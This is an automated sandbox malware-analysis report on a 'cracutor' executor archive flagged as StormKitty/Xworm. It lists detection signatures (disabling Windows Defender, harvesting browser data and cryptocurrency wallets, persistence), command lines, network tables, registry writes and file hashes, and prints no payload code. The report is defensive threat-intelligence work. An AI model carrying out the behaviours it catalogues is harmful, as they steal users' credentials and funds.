Analysis Overview
SHA256
587e590b78e0a3c36a4ac79ccec05415ca510e9ad20345ab39524e0130a8cb75
Threat Level: Known bad
The file cracutor-executor-main.zip was found to be: Known bad.
Malicious Activity Summary
StormKitty
Xworm
StormKitty payload
Detect Xworm Payload
Contains code to disable Windows Defender
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Deletes itself
Drops startup file
Executes dropped EXE
Reads user/profile data of web browsers
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Detects Pyinstaller
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: CmdExeWriteProcessMemorySpam
Modifies registry class
Opens file in notepad (likely ransom note)
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Enumerates processes with tasklist
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-19 17:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240419-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240426-en
Max time kernel
138s
Max time network
128s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Infinity.js"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240221-en
Max time kernel
135s
Max time network
135s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000956de7bbf2750dcf3e96053a3cf53c0fdfe31e82136a7f02f1ee98cfa324a4bd000000000e8000000002000020000000aa9c7ec6005c2e1c0d8b60f1c0d0c559e0a61287322a2f9c310c1fa4a6acb1e19000000019ea18d337f1da05a614b4e7adab7ebb1d0332beda4f422391969eea0125e8a18916e590b3607ce9148ebd8e046a921201fc45fe074c448df3196c8ac781de62a9f023d6708e60c1254835176e1539b8ba0a7220ef2d1a82bfc20b51233fe1ddb65894992702db7247532ebd6bde01c4bbe369c6e29a2e74cb3595f3fff225c30182dab27bea45f9a99e2bff86385f6e40000000c265f2700cc3323a75edb148b34e717e1b21c54394e313ef18cd0277558225df47ca2ab1581ffd4b1f8031800ecc94fb7e1b6c52b433d94439d5f0002074c863 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422301135" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90dce40211aada01 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2D8D8B91-1604-11EF-989B-729E5AF85804} = "0" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000112dd71d930ff24b8b2b71a2c228122b00000000020000000000106600000001000020000000052260c01c53213f9e1f8064637f481cb826ac7e6da447c8ccc427f27f4a2f3d000000000e8000000002000020000000c6c8d80d85782a12eb5890500e3fe619a8f641465b5278917622af7d90a4e03c200000000c646705b686852f41c1a2ed54d6aca14339e3938dd61aebedcf999172bdb6924000000060b38a45fa4a4432be0ccf0b9295269927c40ca7dfd2e1b4e992a927ee236ced5e44ec18f30f7f0ea6dcedc43ed1bea7aa7a153f48fb941bcf53089025c286bb | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"
C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2564 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabB7BD.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\Local\Temp\TarC453.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aa80b60a431b389549cb26e5e9913373 |
| SHA1 | b0855a80f5da6000276e0f612a6179c63962b47f |
| SHA256 | 8d46e539fe50a477c58f135a29ba7d299707f1435b1e9154a76a07a302a1bcea |
| SHA512 | 649cfe3fde3fb1bfa3889eac4481c65afaf27754f06e521e2db99d667385a39e1905364ac8570f5422d1d86d116e0ec1a4cfaaae3ad97a3599655ffd475ab5ca |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a81738119ce0adef12954dfe99baa075 |
| SHA1 | 130e1df2fa9c863107004a3c6f2ab997018ee018 |
| SHA256 | 6c3c1d7b761c8493d4175c9b38395b4237869397ad027c6aa6849532fa6d0449 |
| SHA512 | fec3f964b71fcc481a9aad419b91981dc32f50e2f7802cf47af2cfaa1947a515eae0b27d03550f5a62cde1b5a05730dc37ccef1fb276a78ed6e7a336a8710f1a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3b1efb914d64a90b8c1b91c2d67e40b5 |
| SHA1 | a0ba7dfe0773ab8beff3b70ab40392c2a073c7ba |
| SHA256 | 5be90f278cc26177b98fe5418bbfeff800c135acae8f31807052858ffb856262 |
| SHA512 | 27c3d4a72a9d1c01bdc0d1f6c29ddce5dfaa7ca7be569b2a4d7d77733c002fefb10df9a0be61cc2cfa0347c18d02def4a634754b629fd4f98dde8fb99c4af161 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fb85b73b4a2f2fe654ba401b77baf990 |
| SHA1 | 527395dd766110adf5a30feb83735f0c9e633728 |
| SHA256 | a65b8356894635ddb7ca7ccb6298c4717f26db6340c6150b473c00768007d71e |
| SHA512 | 8df9c0c4b9bed9387ca95448ee4e508abeb3f03916ff9d15a53af45fdaddc6413bc28f3b25f501edcc8856592a1cf0e89c689f6b2b8a50f814c0fdd5fa7a8311 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 22f0f1d0d65d7afd19af79e886c29f7a |
| SHA1 | 78163f71b84e0b8d263f0089d6f2e1a05746c1f2 |
| SHA256 | e026e9a37b1bacf603c0ada8b5c468a427ed4042a5cd926066f804c9a4808e83 |
| SHA512 | 5bcda6bce6c2bae3531b03d48de16b4845ec98968a7e2443d7c04936af0fb4feeeac148158d4b22d5b31d814173defc645a32f26b33035dd4e209aa4c508f708 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 47dea7a0e474654a268679ca13126a35 |
| SHA1 | 23ef6714b518c4c5c21a05ce0d3b59e535246c88 |
| SHA256 | 94d68176ce718a5d100e86a37b665bb2b3466af0d8b8242a818a0add3427253f |
| SHA512 | a615ff216c604e860bd66c014fcd28d998c82d93fb0553214358466a46cc5b45861047604b9fa3b47d7b849efc257a0857a7d1b10f48d0b3d8d6ac13d043f11e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5b6e267ecf346fd56ce5f917a52efcc3 |
| SHA1 | 1ae835f983d91e12caa7478a1893016e32977163 |
| SHA256 | 9a294b6a4a2465a2654920109df99a788b9147e5b2e1dd9efe59dc06ec000913 |
| SHA512 | ada7d48f2e9a2425acf72adc69e64c5600b552d3afada4dd0fe2cd94573e89620ee716a5daa5cce8284febce884584b9c8783f00cd4f54e7e2b39b9c23d8221b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7b18bebe97e9610a0d82eba114a5ffcd |
| SHA1 | 279d386d19b41bbe9a5c3903ab41cd7b82ae7cd8 |
| SHA256 | 4318efa06be4463e8c5dd1ab36b2bc576c8141aa573e62bae1b945b0a35d8cbf |
| SHA512 | 1c5565413ad3fc5d7b5fd162ef05b6bae34797e2f2fb554d4bc33d46d675dad0bceebc1d8d846c9212e9511c85afdbd480476b606d0ff231b5c869eb241d98e4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3acf8dd835de8abdcb4b441d914f00c2 |
| SHA1 | 34f9fa11f06e26bdd2411e1b7f01c78f87f9dcaf |
| SHA256 | 76e90047dac46c1c9773cf12509d5137f56f68d338e9f0367095212133168776 |
| SHA512 | 8e7fbfaf5c4a0cf86cd678a775f7dee23b35a29d4626473f737bf2cc3a18d43fff179d49da45964bb6030a363ba3b0ae246c97daaa90e398f6ff2f6345373291 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bf548f216a0782ae63cd4112299514ec |
| SHA1 | 4e3d61fd5e54dc9737f3e90742b3b0efb29b95f1 |
| SHA256 | 430406aff8ada2ef19c6bd1e7d984f87f49ded89493de181c087ce46c8745d35 |
| SHA512 | badf0ffad69fbb351ba1bad6d566827d6c2b61a2c6a5ca7d08f1252adee90b47311b48708b2f3eca90bf745ff8ec566f48602c04fe144d96870e61465ebc1dc2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 554e7462ce317fd187ba35441cc79e26 |
| SHA1 | 5c9852e821471202cf8e6388caa3ee5faf2be738 |
| SHA256 | cef08c0e2b2888f11e83eb55c8555e87ec68f83e5926d5ffe71b3933fc03e3d6 |
| SHA512 | 7ae66b31119c30d49b42cbdfd7260b34758625a533b5fa07366bf417a0f8458aef1dfda02cf5d81cf8a81b7b1f988b4c0b0430207ce6fefefdaac3702b3132b5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d88ab1419be9005e0c983a9e59e7fa43 |
| SHA1 | 604af517a6381165116a3a53a04a636eb4103fcd |
| SHA256 | a6a6ca0d0033125beb10f1e2a3f792575b0ff09974d93fe1fed63be3b634438f |
| SHA512 | ae72b0dd0b113f8847a16bdcb79567a101e0e90f3c6c8679360ae4611f5ff179d940a5b33bb579ecd3f1140d1a65d42ebbcb967a962125720ec30ef8ac0547b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6621842d05744e79f247a60810a59d2a |
| SHA1 | 999e7291e393b6b8d5f12f243da0f13b797f8413 |
| SHA256 | ce1fa41a78d72edafa64cd78c0cef31fc59ae5453cb48563644c66cf3acb35dc |
| SHA512 | 087ec76eb668bdb15d26ace26f7a38e63751a4a29af119388f724c98a716d9861de4513d19bf5300f7ce1ebb3c90b5a777f6dc4f608418869a5d6aafb51db05c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 356607389d7ef438719bb7d88942f3ab |
| SHA1 | 196bd6b7c53dc6ba5d420fb7e454490bbf718426 |
| SHA256 | 986ac311ff9ccaece1d620b35863b400e9f9c7eff08448e2c99f2a3de2310d40 |
| SHA512 | aa28f4ddb70a87fc13f2dbfc4c7f8fb8a9a62dd5cc17d8d85d5226b2c3f5f638eccb7f48624fb12bdfe11c2246916bc327843dad6a0258e6c9d700a5c762c8b9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 117ee0a8982ecfda5c4c63616e5fcba0 |
| SHA1 | 10f637bd4834a5d29449baa92615ee73f8ff64e3 |
| SHA256 | 423d5c18c479a408a5908b5027b6817f55dc4b7f5a10c3b129da1b5945ad2411 |
| SHA512 | c92d54a6371e1b24fb804a6abf201efb49fdcebc3ca78873275ecf1f4ad1b0c988e09354b498b3107340bca64595ebe9279d5ba9084fca7f172fa19794376099 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4cc770a87bac4e90e069d9c8d6dc8d6b |
| SHA1 | a03430fb8805c03e50c323be73b19cd020dae492 |
| SHA256 | e01af19691bb7affdf71b484831a56b42be503a86091d5cc532d8d3874c4066d |
| SHA512 | 6af1ebfc188e8155258d03592475e3451810f1476e7c8628b36d39ec3e06c65e337f9674822923a04c92aaf36fb271d62df3303d621ff230a8c4395c380380e0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c5592c3c3b6ebfc24352e388f138c7e8 |
| SHA1 | 1a71e444b8eda4012d4219e75d378e344793527a |
| SHA256 | 2d0f461f013c84353fce8413221df5cc543123914bb4a2eafbfd65e02b89d8bf |
| SHA512 | c380efe884d102c7836721bc41f92d021a5d2923aee63b2f7ef67f05aa41afdcd615269a77df947f21fdf3a812f23213cf356f5f4e6c338a686e56933bf31e96 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5ca5b3f39221bad1e085f5bf9e0c33fd |
| SHA1 | c79d2df616e2c7d28a46770b06dc3486b82f4915 |
| SHA256 | a454abbafe8206958f2ac9ef551f11624a06c90862dd9ac8b30b442cf316fcb3 |
| SHA512 | 4b074bd4a70a6aa9ce6c6b3cde7bff2e22aaa800d480fe22315a43d9aa99a2516cd99ec7edf4d3032ce747d8d1f6fbd034a5597739b46e4af2f41ecd06a3d36e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4c86e7d1608bbc45768dd3eed83c125a |
| SHA1 | c4b68763d0608b97561e24889b1928e37283fb1a |
| SHA256 | d7cb00a4b8c149a74b1dc17b57ea0263fc032048ae00890d69f15a50c5868841 |
| SHA512 | d0a6f7c2c02c49a04f8ae2a3315df7337a01809a09ca168b9c1e562364b4367802884bb9851009c859c0ceb586c666c16b038dc0048b1dc95b83da9304ca2441 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.89:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 89.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.89:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.192.11.51.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-19 17:20
Reported
2024-05-19 17:23
Platform
win7-20240221-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1288 wrote to memory of 2744 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
